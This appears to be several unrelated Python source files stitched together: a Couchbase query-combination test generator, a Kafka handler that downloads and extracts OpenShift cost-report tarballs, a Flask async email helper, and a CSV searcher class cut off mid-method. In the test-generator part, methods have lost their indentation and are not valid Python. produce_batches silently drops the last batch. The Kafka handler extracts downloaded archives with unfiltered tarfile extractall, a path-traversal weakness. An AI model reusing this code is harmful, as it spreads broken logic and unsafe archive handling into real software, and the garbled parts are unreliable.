                    for group_by_value in group_by_values:
                        for letting_having_value in letting_having_values:
                            # HAVING/LETTING is only legal together with GROUP BY.
                            if group_by_value == ' ':
                                letting_having_value = ' '
                            for order_by_value in order_by_values:
                                for asc_desc_value in asc_desc_values:
                                    # ASC/DESC is only legal together with ORDER BY.
                                    if order_by_value == ' ':
                                        asc_desc_value = ' '
                                    for limit_value in limit_values:
                                        for offset_value in offset_values:
                                            for bucket_alias_value in bucket_alias_values:
                                                for namespace_value in namespace_values:
                                                    for use_keys_value in use_keys_values:
                                                        for unnest_flatten_value in unnest_flatten_values:
                                                            for join_value in join_values:
                                                                for join_predicate_value in join_predicate_values:
                                                                    join_expression = ' '
                                                                    # When no JOIN variant is chosen, exercise UNNEST/FLATTEN instead.
                                                                    if join_value != ' ':
                                                                        join_expression = join_value + ' ' + namespace_value + ' {0} '.format(self.query_bucket) + bucket_alias_value + ' t2 ' + use_keys_value + join_predicate_value
                                                                    else:
                                                                        join_expression = unnest_flatten_value + ' t1.char_field '
                                                                    for union_value in union_values:
                                                                        union_left_parenthesis = ''
                                                                        union_right_parenthesis = ''
                                                                        right_union_expression = ''
                                                                        # A UNION wraps each side in parentheses and adds a right-hand SELECT.
                                                                        if union_value != ' ':
                                                                            union_left_parenthesis = '('
                                                                            union_right_parenthesis = ')'
                                                                            right_union_expression = union_left_parenthesis + "select t1.char_field, t1.decimal_field, " + window_function_value + alias_value + " " \
                                                                                "from " + namespace_value + ' {0} '.format(self.query_bucket) + bucket_alias_value + " t1 " + use_keys_value + join_expression + let_where_value + group_by_value + letting_having_value + \
                                                                                order_by_value + asc_desc_value + limit_value + offset_value + union_right_parenthesis
                                                                        query = union_left_parenthesis + "select t1.char_field, t1.decimal_field, " + window_function_value + alias_value + \
                                                                            " from " + namespace_value + ' {0} '.format(self.query_bucket) + bucket_alias_value + " t1 " + use_keys_value + join_expression + let_where_value + group_by_value + \
                                                                            letting_having_value + order_by_value + asc_desc_value + limit_value + offset_value + union_right_parenthesis + union_value + right_union_expression
                                                                        result.append(query)
                                                                        counter += 1
        return result
def test_from_select_batches(self):
queries = self.generate_from_select_queries()
batches = self.produce_batches(queries, 4)
for batch in batches:
threads = []
for b in batch:
t = threading.Thread(target=self._run_test, args=(b,))
t.daemon = True
threads.append(t)
t.start()
for th in threads:
th.join()
threads.remove(th)
def _run_test(self, query):
try:
self.run_cbq_query(query)
except CBQError as e:
self.assertEqual('True', 'False', 'Wrong query - ' + str(query))
def test_select_from_batches(self):
queries = self.generate_select_from_queries()
batches = self.produce_batches(queries, 4)
for batch in batches:
threads = []
for b in batch:
t = threading.Thread(target=self._run_test, args=(b,))
t.daemon = True
threads.append(t)
t.start()
for th in threads:
th.join()
threads.remove(th)
def produce_batches(self, queries, batch_size):
result = []
counter = 0
arr = []
for query in queries:
if counter < batch_size:
arr.append(query)
counter += 1
else:
add = copy.copy(arr)
result.append(add)
arr = []
arr.append(query)
counter = 1
return result
def init_nodes(self):
test_bucket_params = self._create_bucket_params(server=self.master, size=self.bucket_size,
replicas=self.num_replicas, bucket_type=self.bucket_type,
enable_replica_index=self.enable_replica_index,
eviction_policy=self.eviction_policy, lww=self.lww)
self.cluster.create_standard_bucket(self.test_bucket, 11222, test_bucket_params)
def load_test_data(self, bucket_name='test_bucket'):
for i in range(0, 1, 1):
initial_statement = (" INSERT INTO {0} (KEY, VALUE) VALUES ('primary_key_" + str(i) + "',").format(
bucket_name)
initial_statement += "{"
initial_statement += "'primary_key':'primary_key_" + str(i) + "','char_field':'" + random.choice(
string.ascii_uppercase) + \
"','decimal_field':" + str(round(10000 * random.random(), 0)) + ",'int_field':" + str(
randint(0, 100000000)) + "})"
self.run_cbq_query(initial_statement)
def adopt_test_data(self, bucket_name='test_bucket'):
self.run_cbq_query("update {0} set decimal_field=null where char_field='A'".format(bucket_name))
self.run_cbq_query("update {0} set decimal_field=missing where char_field='B'".format(bucket_name))
self.run_cbq_query(
"update {0} set decimal_field=null where char_field='C' and decimal_field%2=0".format(bucket_name))
self.run_cbq_query(
"update {0} set decimal_field=missing where char_field='C' and decimal_field%3=0".format(bucket_name))
self.run_cbq_query(
"update {0} set decimal_field=2 where char_field='D' and decimal_field%2=0".format(bucket_name))
self.run_cbq_query("update {0} set decimal_field=1 where char_field='E'".format(bucket_name))
def create_primary_index(self, bucket_name='test_bucket'):
self.run_cbq_query("CREATE PRIMARY INDEX `#primary` ON {0}".format(bucket_name))
def create_secondary_indexes(self, bucket_name='test_bucket'):
self.run_cbq_query('CREATE INDEX ix_char ON {0}(char_field);'.format(bucket_name))
self.run_cbq_query('CREATE INDEX ix_decimal ON {0}(decimal_field);'.format(bucket_name))
self.run_cbq_query('CREATE INDEX ix_int ON {0}(int_field);'.format(bucket_name))
self.run_cbq_query('CREATE INDEX ix_primary ON {0}(primary_key);'.format(bucket_name))
|
kafka_msg_handler.py | #
# Copyright 2021 Red Hat Inc.
# SPDX-License-Identifier: Apache-2.0
#
"""Kafka message handler."""
import itertools
import json
import logging
import os
import re
import shutil
import tempfile
import threading
import time
import traceback
from tarfile import ReadError
from tarfile import TarFile
import requests
from confluent_kafka import Consumer
from confluent_kafka import Producer
from confluent_kafka import TopicPartition
from django.db import connections
from django.db import DEFAULT_DB_ALIAS
from django.db import InterfaceError
from django.db import OperationalError
from kombu.exceptions import OperationalError as RabbitOperationalError
from api.common import log_json
from kafka_utils.utils import is_kafka_connected
from masu.config import Config
from masu.database.report_manifest_db_accessor import ReportManifestDBAccessor
from masu.external import UNCOMPRESSED
from masu.external.accounts_accessor import AccountsAccessor
from masu.external.accounts_accessor import AccountsAccessorError
from masu.external.downloader.ocp.ocp_report_downloader import create_daily_archives
from masu.external.downloader.ocp.ocp_report_downloader import OCPReportDownloader
from masu.processor._tasks.process import _process_report_file
from masu.processor.report_processor import ReportProcessorDBError
from masu.processor.report_processor import ReportProcessorError
from masu.processor.tasks import OCP_QUEUE
from masu.processor.tasks import record_all_manifest_files
from masu.processor.tasks import record_report_status
from masu.processor.tasks import summarize_reports
from masu.prometheus_stats import KAFKA_CONNECTION_ERRORS_COUNTER
from masu.util.ocp import common as utils
LOG = logging.getLogger(__name__)
SUCCESS_CONFIRM_STATUS = "success"
FAILURE_CONFIRM_STATUS = "failure"
class KafkaMsgHandlerError(Exception):
    """Raised for errors while downloading, extracting or handling a Kafka payload."""
def close_and_set_db_connection():  # pragma: no cover
    """Close the default Django db connection and reset it to None."""
    default_db = connections[DEFAULT_DB_ALIAS]
    if default_db.connection:
        default_db.connection.close()
        default_db.connection = None
def delivery_callback(err, msg):
    """Log whether a produced Kafka validation message was delivered."""
    if err is None:
        LOG.info("Validation message delivered.")
    else:
        LOG.error(f"Failed to deliver message: {msg}: {err}")
def create_manifest_entries(report_meta, request_id, context=None):
    """
    Creates manifest database entries for report processing tracking.

    Args:
        report_meta (dict): Report context dictionary from extract_payload.
        request_id (String): Identifier associated with the payload
        context (Dict): Context for logging (account, etc)

    Returns:
        manifest_id (Integer): Manifest identifier of the created db entry.
    """
    # A mutable default argument ({}) is shared across calls; normalize to a
    # fresh dict instead.
    context = context if context is not None else {}
    downloader = OCPReportDownloader(
        report_meta.get("schema_name"),
        report_meta.get("cluster_id"),
        None,
        provider_uuid=report_meta.get("provider_uuid"),
        request_id=request_id,
        account=context.get("account", "no_account"),
    )
    return downloader._prepare_db_manifest_record(report_meta)
def get_account_from_cluster_id(cluster_id, manifest_uuid, context=None):
    """
    Returns the provider details for a given OCP cluster id.

    Args:
        cluster_id (String): Cluster UUID.
        manifest_uuid (String): Identifier associated with the payload manifest
        context (Dict): Context for logging (account, etc).  Mutated in place
            with the resolved provider_uuid when non-empty.

    Returns:
        (dict) - keys: value
            authentication: String,
            customer_name: String,
            billing_source: String,
            provider_type: String,
            schema_name: String,
            provider_uuid: String
        or None when no provider matches the cluster id.
    """
    # Avoid a shared mutable default argument ({}); this function writes into
    # `context` below.
    context = context if context is not None else {}
    account = None
    provider_uuid = utils.get_provider_uuid_from_cluster_id(cluster_id)
    if provider_uuid:
        msg = f"Found provider_uuid: {str(provider_uuid)} for cluster_id: {str(cluster_id)}"
        LOG.info(log_json(manifest_uuid, msg, context))
        if context:
            context["provider_uuid"] = provider_uuid
        account = get_account(provider_uuid, manifest_uuid, context)
    return account
def download_payload(request_id, url, context=None):
    """
    Download the payload from ingress to temporary location.

    Args:
        request_id (String): Identifier associated with the payload
        url (String): URL path to payload in the Insights upload service.
        context (Dict): Context for logging (account, etc)

    Returns:
        Tuple: temp_dir (String), temp_file (String), gzip_filename (String)

    Raises:
        KafkaMsgHandlerError: when the download or the local write fails.
    """
    # Avoid a shared mutable default argument.
    context = context if context is not None else {}
    # Create temporary directory for initial file staging and verification in the
    # OpenShift PVC directory so that any failures can be triaged in the event
    # the pod goes down.
    os.makedirs(Config.PVC_DIR, exist_ok=True)
    temp_dir = tempfile.mkdtemp(dir=Config.PVC_DIR)

    # Download file from quarantine bucket as tar.gz
    try:
        download_response = requests.get(url)
        download_response.raise_for_status()
    except requests.exceptions.HTTPError as err:
        shutil.rmtree(temp_dir)
        msg = f"Unable to download file. Error: {str(err)}"
        LOG.warning(log_json(request_id, msg))
        raise KafkaMsgHandlerError(msg)

    sanitized_request_id = re.sub("[^A-Za-z0-9]+", "", request_id)
    gzip_filename = f"{sanitized_request_id}.tar.gz"
    temp_file = f"{temp_dir}/{gzip_filename}"
    try:
        # Context manager guarantees the handle is closed even if write() fails;
        # the previous open/write/close sequence leaked the handle on error.
        with open(temp_file, "wb") as temp_file_hdl:
            temp_file_hdl.write(download_response.content)
    except (OSError, IOError) as error:
        shutil.rmtree(temp_dir)
        msg = f"Unable to write file. Error: {str(error)}"
        LOG.warning(log_json(request_id, msg, context))
        raise KafkaMsgHandlerError(msg)
    return (temp_dir, temp_file, gzip_filename)
def extract_payload_contents(request_id, out_dir, tarball_path, tarball, context=None):
    """
    Extract the payload contents into a temporary location.

    Args:
        request_id (String): Identifier associated with the payload
        out_dir (String): temporary directory to extract data to
        tarball_path (String): the path to the payload file to extract
        tarball (String): the payload file to extract
        context (Dict): Context for logging (account, etc)

    Returns:
        (List[String]): paths inside the archive that contain manifest.json

    Raises:
        KafkaMsgHandlerError: when the file is missing, cannot be untarred,
            or contains no manifest.
    """
    # Avoid a shared mutable default argument.
    context = context if context is not None else {}
    # Extract tarball into temp directory
    if not os.path.isfile(tarball_path):
        msg = f"Unable to find tar file {tarball_path}."
        LOG.warning(log_json(request_id, msg, context))
        raise KafkaMsgHandlerError("Extraction failure, file not found.")

    try:
        # Use a context manager so the tar file handle is always closed;
        # the previous code leaked it.
        with TarFile.open(tarball_path, mode="r:gz") as mytar:
            mytar.extractall(path=out_dir)
            files = mytar.getnames()
            manifest_path = [manifest for manifest in files if "manifest.json" in manifest]
    except (ReadError, EOFError, OSError) as error:
        msg = f"Unable to untar file {tarball_path}. Reason: {str(error)}"
        LOG.warning(log_json(request_id, msg, context))
        shutil.rmtree(out_dir)
        raise KafkaMsgHandlerError("Extraction failure.")

    if not manifest_path:
        msg = "No manifest found in payload."
        LOG.warning(log_json(request_id, msg, context))
        raise KafkaMsgHandlerError("No manifest found in payload.")
    return manifest_path
def construct_parquet_reports(request_id, context, report_meta, payload_destination_path, report_file):
    """Build, upload and convert parquet daily archives for one report file."""
    return create_daily_archives(
        request_id,
        report_meta["account"],
        report_meta["provider_uuid"],
        report_file,
        payload_destination_path,
        report_meta["manifest_id"],
        report_meta["date"],
        context,
    )
# pylint: disable=too-many-locals
def extract_payload(url, request_id, context=None):  # noqa: C901
    """
    Extract OCP usage report payload into local directory structure.

    Payload is expected to be a .tar.gz file that contains:
    1. manifest.json - dictionary containing usage report details needed
        for report processing.
        Dictionary Contains:
            files - names of .csv usage reports for the manifest
            date - DateTime that the payload was created
            uuid - uuid for payload
            cluster_id - OCP cluster ID.
    2. *.csv - Actual usage report for the cluster.  Format is:
        Format is: <uuid>_report_name.csv

    On successful completion the report and manifest will be in a directory
    structure that the OCPReportDownloader is expecting.

    Ex: /var/tmp/insights_local/my-ocp-cluster-1/20181001-20181101

    Once the files are extracted:
    1. Provider account is retrieved for the cluster id.  If no account is found we return.
    2. Manifest database record is created which will establish the assembly_id and number of files
    3. Report stats database record is created and is used as a filter to determine if the file
       has already been processed.
    4. All report files that have not been processed will have the local path to that report file
       added to the report_meta context dictionary for that file.
    5. Report file context dictionaries that require processing is added to a list which will be
       passed to the report processor.  All context from report_meta is used by the processor.

    Args:
        url (String): URL path to payload in the Insights upload service..
        request_id (String): Identifier associated with the payload
        context (Dict): Context for logging (account, etc)

    Returns:
        [dict]: keys: value
                files: [String],
                date: DateTime,
                cluster_id: String
                manifest_path: String,
                provider_uuid: String,
                provider_type: String
                schema_name: String
                manifest_id: Integer
                current_file: String
    """
    # This function writes into `context` (cluster_id, account, provider_type),
    # so the previous mutable default argument ({}) leaked state between
    # payloads.  Use a fresh dict per call instead.
    if context is None:
        context = {}
    temp_dir, temp_file_path, temp_file = download_payload(request_id, url, context)
    manifest_path = extract_payload_contents(request_id, temp_dir, temp_file_path, temp_file, context)

    # Open manifest.json file and build the payload dictionary.
    full_manifest_path = f"{temp_dir}/{manifest_path[0]}"
    report_meta = utils.get_report_details(os.path.dirname(full_manifest_path))

    # Filter and get account from payload's cluster-id
    cluster_id = report_meta.get("cluster_id")
    manifest_uuid = report_meta.get("uuid", request_id)
    LOG.info(
        log_json(
            request_id,
            f"Payload with the request id {request_id} from cluster {cluster_id}"
            + f"is part of the report with manifest id {manifest_uuid}",
        )
    )
    if context:
        context["cluster_id"] = cluster_id
    account = get_account_from_cluster_id(cluster_id, manifest_uuid, context)
    if not account:
        msg = f"Received unexpected OCP report from {cluster_id}"
        LOG.warning(log_json(manifest_uuid, msg, context))
        shutil.rmtree(temp_dir)
        return None, manifest_uuid

    schema_name = account.get("schema_name")
    provider_type = account.get("provider_type")
    context["account"] = schema_name[4:]
    context["provider_type"] = provider_type
    report_meta["provider_uuid"] = account.get("provider_uuid")
    report_meta["provider_type"] = provider_type
    report_meta["schema_name"] = schema_name
    report_meta["account"] = schema_name[4:]
    report_meta["request_id"] = request_id
    report_meta["tracing_id"] = manifest_uuid

    # Create directory tree for report.
    usage_month = utils.month_date_range(report_meta.get("date"))
    destination_dir = f"{Config.INSIGHTS_LOCAL_REPORT_DIR}/{report_meta.get('cluster_id')}/{usage_month}"
    os.makedirs(destination_dir, exist_ok=True)

    # Copy manifest
    manifest_destination_path = f"{destination_dir}/{os.path.basename(report_meta.get('manifest_path'))}"
    shutil.copy(report_meta.get("manifest_path"), manifest_destination_path)

    # Save Manifest
    report_meta["manifest_id"] = create_manifest_entries(report_meta, request_id, context)

    # Copy report payload
    report_metas = []
    for report_file in report_meta.get("files"):
        current_meta = report_meta.copy()
        subdirectory = os.path.dirname(full_manifest_path)
        payload_source_path = f"{subdirectory}/{report_file}"
        payload_destination_path = f"{destination_dir}/{report_file}"
        try:
            shutil.copy(payload_source_path, payload_destination_path)
            current_meta["current_file"] = payload_destination_path
            record_all_manifest_files(report_meta["manifest_id"], report_meta.get("files"), manifest_uuid)
            if not record_report_status(report_meta["manifest_id"], report_file, manifest_uuid, context):
                msg = f"Successfully extracted OCP for {report_meta.get('cluster_id')}/{usage_month}"
                LOG.info(log_json(manifest_uuid, msg, context))
                construct_parquet_reports(request_id, context, report_meta, payload_destination_path, report_file)
                report_metas.append(current_meta)
            else:
                # Report already processed
                pass
        except FileNotFoundError:
            msg = f"File {str(report_file)} has not downloaded yet."
            LOG.debug(log_json(manifest_uuid, msg, context))

    # Remove temporary directory and files
    shutil.rmtree(temp_dir)
    return report_metas, manifest_uuid
@KAFKA_CONNECTION_ERRORS_COUNTER.count_exceptions()
def send_confirmation(request_id, status):  # pragma: no cover
    """
    Send kafka validation message to Insights Upload service.

    When a new file lands for topic 'hccm' we must validate it
    so that it will be made permanently available to other
    apps listening on the 'platform.upload.available' topic.

    Args:
        request_id (String): Request ID for file being confirmed.
        status (String): Either 'success' or 'failure'

    Returns:
        None
    """
    producer = get_producer()
    # The upload service keys validation results on the original request id.
    validation = {"request_id": request_id, "validation": status}
    msg = bytes(json.dumps(validation), "utf-8")
    producer.produce(Config.VALIDATION_TOPIC, value=msg, callback=delivery_callback)
    # Wait up to 1 second for events. Callbacks will be invoked during
    # this method call if the message is acknowledged.
    # `flush` makes this process synchronous compared to async with `poll`
    producer.flush(1)
def handle_message(msg):
    """
    Handle messages from message pending queue.

    Handle's messages with topics: 'platform.upload.hccm',
    and 'platform.upload.available'.

    The OCP cost usage payload will land on topic hccm.
    These messages will be extracted into the local report
    directory structure.  Once the file has been verified
    (successfully extracted) we will report the status to
    the Insights Upload Service so the file can be made available
    to other apps on the service.

    Messages on the available topic are messages that have
    been verified by an app on the Insights upload service.
    For now we are just logging the URL for demonstration purposes.
    In the future if we want to maintain a URL to our report files
    in the upload service we could look for hashes for files that
    we have previously validated on the hccm topic.

    Args:
        msg - Upload Service message containing usage payload information.

    Returns:
        (String, [dict], String) - Upload Service confirmation status,
            list of report meta dictionaries (see extract_payload), and the
            manifest uuid.
    """
    if msg.topic() == Config.HCCM_TOPIC:
        value = json.loads(msg.value().decode("utf-8"))
        request_id = value.get("request_id", "no_request_id")
        account = value.get("account", "no_account")
        context = {"account": account}
        try:
            # Use a dedicated variable for log text; the previous code rebound
            # the `msg` parameter, shadowing the Kafka message object.
            log_msg = f"Extracting Payload for msg: {str(value)}"
            LOG.info(log_json(request_id, log_msg, context))
            report_metas, manifest_uuid = extract_payload(value["url"], request_id, context)
            return SUCCESS_CONFIRM_STATUS, report_metas, manifest_uuid
        except (OperationalError, InterfaceError) as error:
            # Database hiccup: reset the connection and propagate so the
            # caller can rewind and retry the same offset.
            close_and_set_db_connection()
            log_msg = f"Unable to extract payload, db closed. {type(error).__name__}: {error}"
            LOG.error(log_json(request_id, log_msg, context))
            raise KafkaMsgHandlerError(log_msg)
        except Exception as error:  # noqa
            traceback.print_exc()
            log_msg = f"Unable to extract payload. Error: {type(error).__name__}: {error}"
            LOG.warning(log_json(request_id, log_msg, context))
            return FAILURE_CONFIRM_STATUS, None, None
    else:
        LOG.error("Unexpected Message")
    return None, None, None
def get_account(provider_uuid, manifest_uuid, context=None):
    """
    Retrieve a provider's account configuration needed for processing.

    Args:
        provider_uuid (String): Provider unique identifier.
        manifest_uuid (String): Identifier associated with the payload manifest
        context (Dict): Context for logging (account, etc)

    Returns:
        (dict) - keys: value
            authentication: String,
            customer_name: String,
            billing_source: String,
            provider_type: String,
            schema_name: String,
            provider_uuid: String
        or None when accounts could not be retrieved or none exist.
    """
    # Avoid a shared mutable default argument.
    context = context if context is not None else {}
    try:
        all_accounts = AccountsAccessor().get_accounts(provider_uuid)
    except AccountsAccessorError as error:
        msg = f"Unable to get accounts. Error: {str(error)}"
        LOG.warning(log_json(manifest_uuid, msg, context))
        return None
    return all_accounts.pop() if all_accounts else None
def summarize_manifest(report_meta, manifest_uuid):
    """
    Kick off manifest summary when all report files have completed line item processing.

    Args:
        report_meta (Dict) - keys: value
            schema_name: String,
            manifest_id: Integer,
            provider_uuid: String,
            provider_type: String,
            start (optional): DateTime,
            end (optional): DateTime
        manifest_uuid (string) - The id associated with the payload manifest

    Returns:
        Celery Async UUID, or None when the manifest is not ready for summary.
    """
    async_id = None
    # The duplicate second `schema_name = report_meta.get("schema_name")`
    # assignment from the previous version has been removed.
    schema_name = report_meta.get("schema_name")
    manifest_id = report_meta.get("manifest_id")
    provider_uuid = report_meta.get("provider_uuid")
    provider_type = report_meta.get("provider_type")
    start_date = report_meta.get("start")
    end_date = report_meta.get("end")
    with ReportManifestDBAccessor() as manifest_accesor:
        if manifest_accesor.manifest_ready_for_summary(manifest_id):
            report_meta = {
                "schema_name": schema_name,
                "provider_type": provider_type,
                "provider_uuid": provider_uuid,
                "manifest_id": manifest_id,
            }
            if start_date and end_date:
                LOG.info(
                    log_json(
                        manifest_uuid,
                        f"Summarizing OCP reports from {str(start_date)}-{str(end_date)} for provider: {provider_uuid}",
                    )
                )
                report_meta["start"] = start_date
                report_meta["end"] = end_date
            report_meta["manifest_uuid"] = manifest_uuid
            async_id = summarize_reports.s([report_meta], OCP_QUEUE).apply_async(queue=OCP_QUEUE)
    return async_id
def process_report(request_id, report):
    """
    Process line item report.

    Returns True when line item processing is complete. This is important because
    the listen_for_messages -> process_messages path must have a positive acknowledgement
    that line item processing is complete before committing.

    If the service goes down in the middle of processing (SIGTERM) we do not want a
    stray kafka commit to prematurely commit the message before processing has been
    complete.

    Args:
        request_id (Str): The request id
        report (Dict) - keys: value
            request_id: String,
            account: String,
            schema_name: String,
            manifest_id: Integer,
            provider_uuid: String,
            provider_type: String,
            current_file: String,
            date: DateTime

    Returns:
        True if line item report processing is complete.
    """
    # The create_table flag is used by the ParquetReportProcessor
    # to create a Hive/Trino table.
    report_dict = {
        "file": report.get("current_file"),
        "compression": UNCOMPRESSED,
        "manifest_id": report.get("manifest_id"),
        "provider_uuid": str(report.get("provider_uuid")),
        "request_id": request_id,
        "tracing_id": report.get("tracing_id"),
        "provider_type": "OCP",
        "start_date": report.get("date"),
        "create_table": True,
    }
    try:
        return _process_report_file(report.get("schema_name"), report.get("provider_type"), report_dict)
    except NotImplementedError as err:
        LOG.info(f"NotImplementedError: {str(err)}")
        return True
def report_metas_complete(report_metas):
    """
    Verify if all reports from the ingress payload have been processed.

    in process_messages, a dictionary value "process_complete" is added to the
    report metadata dictionary for a report file. This must be True for it to be
    considered processed.

    Args:
        report_metas (list) - List of report metadata dictionaries needed for line item
        processing.

    Returns:
        True only when the list is non-empty and every report meta has a
        truthy "process_complete" flag.
    """
    if not report_metas:
        # Preserve historical behavior: an empty list is not "complete".
        return False
    return all(meta.get("process_complete") for meta in report_metas)
def process_messages(msg):
    """
    Process messages and send validation status.

    Processing involves:
    1. Downloading, verifying, extracting, and preparing report files for processing.
    2. Line item processing each report file in the payload (downloaded from step 1).
    3. Check if all reports have been processed for the manifest and if so, kick off
       the celery worker task to summarize.
    4. Send payload validation status to ingress service.

    Args:
        msg (ConsumerRecord) - Message from kafka hccm topic.

    Returns:
        process_complete (Boolean): True when every report file in the payload
        finished line item processing.
    """
    process_complete = False
    status, report_metas, manifest_uuid = handle_message(msg)
    value = json.loads(msg.value().decode("utf-8"))
    request_id = value.get("request_id", "no_request_id")
    # Prefer the manifest uuid for tracing; fall back to the request id.
    tracing_id = manifest_uuid or request_id
    if report_metas:
        for report_meta in report_metas:
            report_meta["process_complete"] = process_report(request_id, report_meta)
            LOG.info(log_json(tracing_id, f"Processing: {report_meta.get('current_file')} complete."))
        process_complete = report_metas_complete(report_metas)
        # NOTE(review): uses the last report_meta from the loop above —
        # presumably all metas share the same manifest-level fields; confirm.
        summary_task_id = summarize_manifest(report_meta, tracing_id)
        if summary_task_id:
            LOG.info(log_json(tracing_id, f"Summarization celery uuid: {summary_task_id}"))
    if status:
        if report_metas:
            file_list = [meta.get("current_file") for meta in report_metas]
            files_string = ",".join(map(str, file_list))
            LOG.info(log_json(tracing_id, f"Sending Ingress Service confirmation for: {files_string}"))
        else:
            LOG.info(log_json(tracing_id, f"Sending Ingress Service confirmation for: {value}"))
        send_confirmation(value["request_id"], status)
    return process_complete
def get_consumer():  # pragma: no cover
    """Create a Kafka consumer subscribed to the HCCM topic."""
    consumer_conf = {
        "bootstrap.servers": Config.INSIGHTS_KAFKA_ADDRESS,
        "group.id": "hccm-group",
        "queued.max.messages.kbytes": 1024,
        "enable.auto.commit": False,
        "max.poll.interval.ms": 1080000,  # 18 minutes
    }
    consumer = Consumer(consumer_conf, logger=LOG)
    consumer.subscribe([Config.HCCM_TOPIC])
    return consumer
def get_producer():  # pragma: no cover
    """Create a Kafka producer for validation messages."""
    producer_conf = {"bootstrap.servers": Config.INSIGHTS_KAFKA_ADDRESS, "message.timeout.ms": 1000}
    return Producer(producer_conf)
def listen_for_messages_loop():
    """Wrap listen_for_messages in while true."""
    consumer = get_consumer()
    LOG.info("Consumer is listening for messages...")
    for _ in itertools.count():  # equivalent to while True, but mockable
        msg = consumer.poll(timeout=1.0)
        if msg is None:
            continue
        if msg.error():
            # Count and log consumer-level errors, then keep polling.
            KAFKA_CONNECTION_ERRORS_COUNTER.inc()
            LOG.error(f"[listen_for_messages_loop] consumer.poll message: {msg}. Error: {msg.error()}")
            continue
        listen_for_messages(msg, consumer)
def rewind_consumer_to_retry(consumer, topic_partition):
    """Log, seek the consumer back to *topic_partition*, and back off before retry."""
    offset = topic_partition.offset
    partition = topic_partition.partition
    LOG.info(f"Seeking back to offset: {offset}, partition: {partition}")
    consumer.seek(topic_partition)
    time.sleep(Config.RETRY_SECONDS)
def listen_for_messages(msg, consumer):
    """
    Listen for messages on the hccm topic.

    Once a message from one of these topics arrives, we add
    them extract the payload and line item process the report files.

    Once all files from the manifest are complete a celery job is
    dispatched to the worker to complete summary processing for the manifest.

    Several exceptions can occur while listening for messages:
    Database Errors - Re-processing attempts will be made until successful.
    Internal Errors - Re-processing attempts will be made until successful.
    Report Processing Errors - Kafka message will be committed with an error.
                               Errors of this type would require a report processor
                               fix and we do not want to block the message queue.

    Upon successful processing the kafka message is manually committed.  Manual
    commits are used so we can use the message queue to store unprocessed messages
    to make the service more tolerant of SIGTERM events.

    Args:
        msg - (Message): message retrieved from the HCCM ingress topic.
        consumer - (Consumer): kafka consumer for HCCM ingress topic.

    Returns:
        None
    """
    offset = msg.offset()
    partition = msg.partition()
    topic_partition = TopicPartition(topic=Config.HCCM_TOPIC, partition=partition, offset=offset)
    try:
        LOG.info(f"Processing message offset: {offset} partition: {partition}")
        process_messages(msg)
        LOG.debug(f"COMMITTING: message offset: {offset} partition: {partition}")
        consumer.commit()
    except (InterfaceError, OperationalError, ReportProcessorDBError) as error:
        # Transient database failure: reset the connection, then rewind and
        # retry the same offset instead of committing.
        close_and_set_db_connection()
        LOG.error(f"[listen_for_messages] Database error. Error: {type(error).__name__}: {error}. Retrying...")
        rewind_consumer_to_retry(consumer, topic_partition)
    except (KafkaMsgHandlerError, RabbitOperationalError) as error:
        # Internal/broker failure: rewind and retry the same offset.
        LOG.error(f"[listen_for_messages] Internal error. {type(error).__name__}: {error}. Retrying...")
        rewind_consumer_to_retry(consumer, topic_partition)
    except ReportProcessorError as error:
        # Report processing errors require a processor fix; commit so the
        # message queue is not blocked on this message.
        LOG.error(f"[listen_for_messages] Report processing error: {str(error)}")
        LOG.debug(f"COMMITTING: message offset: {offset} partition: {partition}")
        consumer.commit()
    except Exception as error:
        # Neither committed nor rewound: the message is re-delivered on the
        # next poll of this partition.
        LOG.error(f"[listen_for_messages] UNKNOWN error encountered: {type(error).__name__}: {error}", exc_info=True)
def koku_listener_thread():  # pragma: no cover
    """
    Configure Listener listener thread.

    Returns:
        None
    """
    # Check that Kafka is running before entering the poll loop.
    if not is_kafka_connected(Config.INSIGHTS_KAFKA_HOST, Config.INSIGHTS_KAFKA_PORT):
        return
    LOG.info("Kafka is running.")
    try:
        listen_for_messages_loop()
    except KeyboardInterrupt:
        exit(0)
def initialize_kafka_handler():  # pragma: no cover
    """
    Start Listener thread.

    Args:
        None

    Returns:
        None
    """
    if not Config.KAFKA_CONNECT:
        return
    listener = threading.Thread(target=koku_listener_thread)
    listener.daemon = True
    listener.start()
    # Block on the listener so this call keeps the process alive with it.
    listener.join()
|
email.py | from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from . import mail
def send_async_email(app, msg):
    """Send *msg* inside *app*'s application context (run from a worker thread)."""
    with app.app_context():
        mail.send(msg)
def send_email(to, subject, template, **kwargs):
    """Render *template* (.txt and .html variants) and send it asynchronously.
    Args:
        to: recipient email address.
        subject: subject line; FLASKY_MAIL_SUBJECT_PREFIX is prepended.
        template: template path without extension; both '.txt' and '.html'
            variants are rendered with **kwargs.
    Returns:
        The started Thread delivering the message, so callers may join() it.
    """
    # _get_current_object() unwraps the current_app proxy so the worker thread
    # can build its own application context from the real app object.
    app = current_app._get_current_object()
    msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
                  sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])
    msg.body = render_template(template + '.txt', **kwargs)
    msg.html = render_template(template + '.html', **kwargs)
    thr = Thread(target=send_async_email, args=[app, msg])
    thr.start()
    return thr
|
searcher.py | import os
import logging
from unicodecsv import writer
from collections import OrderedDict
from collections import defaultdict
from Queue import Queue
from threading import RLock, Thread
from pprint import pprint # noqa
import multiprocessing
from tabref.util import normalize_value, decode_path
log = logging.getLogger(__name__)
class TableSearcher(object):
    """Match every row of a tabular source against ``matcher`` and log hits to CSV.
    Rows are fed through a bounded queue to one worker thread per CPU core;
    matches are appended to ``<base_name>.csv`` inside ``out_dir`` under a lock.
    NOTE(review): ``self.rows()`` is not defined on this class — it appears to
    be supplied by a subclass or mixin; confirm against the callers.
    """
    def __init__(self, matcher, out_dir, base_name):
        self.matcher = matcher
        self.out_dir = decode_path(out_dir)
        self.base_name = base_name
        # Bounded queue so the producer blocks instead of exhausting memory.
        self.queue = Queue(maxsize=50000)
        self.match_count = 0
        self.lock = RLock()
        try:
            os.makedirs(self.out_dir)
        except OSError:
            # Directory already exists (or cannot be created). The previous
            # bare ``except:`` also swallowed KeyboardInterrupt/SystemExit.
            pass
        self.result_writer = None
    def write_result(self, result):
        """Append one match row to the CSV, creating the writer lazily."""
        self.lock.acquire()
        try:
            if self.result_writer is None:
                # Column order is fixed by the first result's keys; all later
                # rows are emitted in that same order.
                self.headers = result.keys()
                result_path = '%s.csv' % self.base_name
                result_path = decode_path(result_path)
                result_path = os.path.join(self.out_dir, result_path)
                self.result_fh = open(result_path, 'w')
                self.result_writer = writer(self.result_fh)
